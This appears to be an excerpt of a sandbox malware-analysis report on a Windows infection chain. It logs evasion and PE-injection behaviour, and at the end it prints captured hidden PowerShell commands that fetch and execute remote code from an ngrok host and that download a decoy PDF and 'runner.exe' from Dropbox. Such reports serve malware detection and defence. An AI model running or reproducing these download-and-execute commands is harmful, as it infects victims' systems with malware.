Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	API/Special instruction interceptor: Address: 7FFBCB7AD044
Source: C:\Windows\SysWOW64\fontdrvhost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD044
Source: C:\Windows\SysWOW64\fontdrvhost.exe	API/Special instruction interceptor: Address: 58FB83A

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2354917207.0000000004929000.00000040.00001000.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2353709399.0000000002B45000.00000040.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2367671427.0000000002C79000.00000040.00000400.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2363531845.0000000002C79000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2354917207.0000000004929000.00000040.00001000.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2353709399.0000000002B45000.00000040.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2367671427.0000000002C79000.00000040.00000400.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2363531845.0000000002C79000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INTERNALNAMECFF EXPLORER.EXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593196
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593025
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592915
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592798
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592564
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592439
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591861
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591735

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4090	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5688	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1601
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4829
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4826

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4520	Thread sleep count: 4090 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4520	Thread sleep count: 5688 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5564	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4924	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568	Thread sleep count: 4829 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep count: 34 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9092	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8476	Thread sleep count: 4826 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -593196s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -593025s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -592915s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -592798s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -592672s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -592564s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -592439s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -592280s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -591988s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -591861s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032	Thread sleep time: -591735s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593196
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593025
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592915
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592798
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592564
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592439
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591861
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591735

Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: ..\hkinternal/collide/mopp/machine/hkMoppUsingFloatAabbVirtualMachine.inl
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AE01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: fontdrvhost.exe, 0000001D.00000002.2472399777.0000000003600000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: }R9Ym'HgFs
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: G.\collide\mopp\machine\hkMoppAabbCastVirtualMachine.cpp..\hkinternal/collide/mopp/machine/hkMoppUsingFloatAabbVirtualMachine.inl
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppObbVirtualMachine.cpp
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AE01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppObbVirtualMachine.cpp.\collide\mopp\machine\hkMoppLongRayVirtualMachine.cpp
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppLongRayVirtualMachine.cpp
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppKDopGeometriesVirtualMachine.cpp
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: +2.\collide\mopp\machine\hkMoppEarlyExitObbVirtualMachine.cpp
Source: fontdrvhost.exe, 0000001D.00000003.2371296262.00000000058B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppSphereVirtualMachine.cpp
Source: svchost.exe, 00000007.00000002.2690496075.0000024B7CE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2687442048.0000024B7B82B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000002.2472281045.000000000350B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppModifyVirtualMachine.cpp
Source: msedge.exe, 00000006.00000003.1633818568.000058400034C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppFindAllVirtualMachine.cpp
Source: fontdrvhost.exe, 0000001D.00000003.2371296262.00000000058B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AE01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: .\collide\mopp\machine\hkMoppSphereVirtualMachine.cppUnknown command - This mopp data has been corrupted (check for memory trashing), or an hkMoppBvTreeShape has been pointed at invalid mopp data.
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: +2.\collide\mopp\machine\hkMoppEarlyExitObbVirtualMachine.cpp.\collide\mopp\machine\hkMoppKDopGeometriesVirtualMachine.cpp.\collide\mopp\machine\hkMoppFindAllVirtualMachine.cpp.\collide\mopp\machine\hkMoppModifyVirtualMachine.cpp
Source: msedge.exe, 00000006.00000002.1722098161.00000170B4442000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2293605870.000001CA22E80000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1810890321.0000028429843000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: G.\collide\mopp\machine\hkMoppAabbCastVirtualMachine.cpp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe

Code function: 28_3_02C692CC VirtualAlloc,VirtualAlloc,VirtualProtect,LdrInitializeThunk,VirtualFree,

28_3_02C692CC

Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C69277 mov eax, dword ptr fs:[00000030h]		28_3_02C69277
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 29_3_02FF0283 mov eax, dword ptr fs:[00000030h]		29_3_02FF0283

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe

Process created: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe "C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe"

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe

Memory written: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe base: 2C30000 value starts with: 4D5A

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\39750847.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\39350554-cb9f-4577-be49-6b699e44992e.pdf
